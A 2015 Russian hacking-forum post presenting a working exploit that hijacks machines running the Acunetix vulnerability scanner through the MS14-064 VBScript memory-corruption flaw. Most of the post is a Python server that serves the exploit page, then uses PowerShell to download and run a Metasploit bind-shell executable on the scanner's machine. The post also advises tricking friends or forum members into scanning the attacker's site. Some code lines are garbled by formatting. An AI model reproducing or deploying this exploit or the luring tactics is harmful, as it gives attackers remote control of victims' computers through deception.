Новость Уязвимость в сканерах на уязвимости

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 17 июн 2015.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.810
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +961 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!

    Протокол отправки запросов посылаемые acunetix-ом , да и другими сканерами уязвим к ms14-064 ( уязвимость ie 6- 11 , выполняет код через VBS ).

    Соответственно если просканить acunetix ом вебсервер , на котором будет размещен этот эксплоит , то на машине сканирующего запуститься пейлоад .

    Примерно работать это должно так:

    1)Скрипт питона запускает сервер с эксплойтом на вашем компе .

    2)Пишите вашему другу с ауентиксом : Хей , у меня порты сломались , ауентикс не работает , проскань мой сайт .

    Или постишь на хак форуме . Йо школота ! Тут порно-сайт нашел с php injection , и он ваще дырявый как друшлак . Сканьте аукхуентиксом, шобы найти в какую дыру присунуть ваш проворный сплойт .

    3) Профит !

    Сам эксплоит:

    Код:
    #!/usr/bin/python
    import BaseHTTPServersyssocket
    ##
    # Acunetix OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
    # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
    # Target Login Sequence
    # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
    # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
    # Metasploit windows/shell_bind_tcp Executable Payload
    # And Finally You Can Connect To Victim Machine Using Netcat
    # Usage:
    #       chmod +x acunetix.py
    #       ./acunetix.py
    #       Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
    #       nc 192.168.1.7 333
    # Payload Generated By This Command:    msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
    #
    # Video: https://vid.me/SRCb
    ##
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        
    def do_GET(req):
            
    req.send_response(200)
            if 
    req.path == "/acunetix.exe":
                
    req.send_header('Content-type''application/exe')
                
    req.end_headers()
                
    exe open("acunetix.exe"'rb')
                
    req.wfile.write(exe.read())
                
    exe.close()
            else:
                
    req.send_header('Content-type''text/html')
                
    req.end_headers()
                
    req.wfile.write("""Please scan me!
                               <SCRIPT LANGUAGE="
    VBScript">
                               function runmumaa()
                               On Error Resume Next
                               set shell=createobject("
    Shell.Application")
                               command="
    Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
                               
    'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
                               shell.ShellExecute "
    powershell", "-Command " & command, "", "runas", 0
                               end function
                               dim   aa()
                               dim   ab()
                               dim   a0
                               dim   a1
                               dim   a2
                               dim   a3
                               dim   win9x
                               dim   intVersion
                               dim   rnda
                               dim   funclass
                               dim   myarray
                               Begin()
                               function Begin()
                                 On Error Resume Next
                                 info=Navigator.UserAgent
                                 if(instr(info,"
    Win64")>0)   then
                                    exit   function
                                 end if
                                 if (instr(info,"
    MSIE")>0)   then
                                            intVersion = CInt(Mid(info, InStr(info, "
    MSIE") + 5, 2))
                                 else
                                    exit   function
                                       
                                 end if
                                 win9x=0
                                 BeginInit()
                                 If Create()=True Then
                                    myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
                                    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
                                    if(intVersion<4) then
                                        document.write("
    <brIE")
                                        document.write(intVersion)
                                        runshellcode()                
                                    else
                                         setnotsafemode()
                                    end if
                                 end if
                               end function
                               function BeginInit()
                                  Randomize()
                                  redim aa(5)
                                  redim ab(5)
                                  a0=13+17*rnd(6)
                                  a3=7+3*rnd(5)
                               end function
                               function Create()
                                 On Error Resume Next
                                 dim i
                                 Create=False
                                 For i = 0 To 400
                                   If Over()=True Then
                                   '   document.write(i)
                                      Create=True
                                      Exit For
                                   End If
                                 Next
                               end function
                               sub testaa()
                               end sub
                               function mydata()
                                   On Error Resume Next
                                    i=testaa
                                    i=null
                                    redim  Preserve aa(a2)
                             
                                    ab(0)=0
                                    aa(a1)=i
                                    ab(0)=6.36598737437801E-314
                                    aa(a1+2)=myarray
                                    ab(2)=1.74088534731324E-310
                                    mydata=aa(a1)
                                    redim  Preserve aa(a0)
                               end function
                               function setnotsafemode()
                                   On Error Resume Next
                                   i=mydata()
                                   i=readmemo(i+8)
                                   i=readmemo(i+16)
                                   j=readmemo(i+&h134)
                                   for k=0 to &h60 step 4
                                       j=readmemo(i+&h120+k)
                                       if(j=14) then
                                             j=0      
                                             redim  Preserve aa(a2)        
                                    aa(a1+2)(i+&h11c+k)=ab(4)
                                             redim  Preserve aa(a0)
                                    j=0
                                             j=readmemo(i+&h120+k)
                                   
                                              Exit for
                                          end if
                                   next
                                   ab(2)=1.69759663316747E-313
                                   runmumaa()
                               end function
                               function Over()
                                   On Error Resume Next
                                   dim type1,type2,type3
                                   Over=False
                                   a0=a0+a3
                                   a1=a0+2
                                   a2=a0+&h8000000
                             
                                   redim  Preserve aa(a0)
                                   redim   ab(a0)
                             
                                   redim  Preserve aa(a2)
                             
                                   type1=1
                                   ab(0)=1.123456789012345678901234567890
                                   aa(a0)=10
                                     
                                   If(IsObject(aa(a1-1)) = False) Then
                                      if(intVersion<4) then
                                          mem=cint(a0+1)*16        
                                          j=vartype(aa(a1-1))
                                          if((j=mem+4) or (j*8=mem+8)) then
                                             if(vartype(aa(a1-1))<>0)  Then
                                                If(IsObject(aa(a1)) = False ) Then        
                                                  type1=VarType(aa(a1))
                                                end if          
                                             end if
                                          else
                                            redim  Preserve aa(a0)
                                            exit  function
                                          end if
                                       else
                                          if(vartype(aa(a1-1))<>0)  Then
                                             If(IsObject(aa(a1)) = False ) Then
                                                 type1=VarType(aa(a1))
                                             end if          
                                           end if
                                       end if
                                   end if
                                         
                               
                                   If(type1=&h2f66) Then    
                                         Over=True  
                                   End If
                                   If(type1=&hB9AD) Then
                                         Over=True
                                         win9x=1
                                   End If
                                   redim  Preserve aa(a0)      
                                   
                               end function
                               function ReadMemo(add)
                                   On Error Resume Next
                                   redim  Preserve aa(a2)
                             
                                   ab(0)=0
                                   aa(a1)=add+4
                                   ab(0)=1.69759663316747E-313  
                                   ReadMemo=lenb(aa(a1))
                             
                                   ab(0)=0
                           
                                   redim  Preserve aa(a0)
                               end function
                               </script>"""
    )
    if 
    __name__ == '__main__':
        
    sclass BaseHTTPServer.HTTPServer
        server 
    sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
        print 
    "Http server started"socket.gethostbyname(socket.gethostname()), 80
        
    try:
            
    server.serve_forever()
        
    except KeyboardInterrupt:
            
    pass
        server
    .server_close()

    Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!

    Видео:

     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей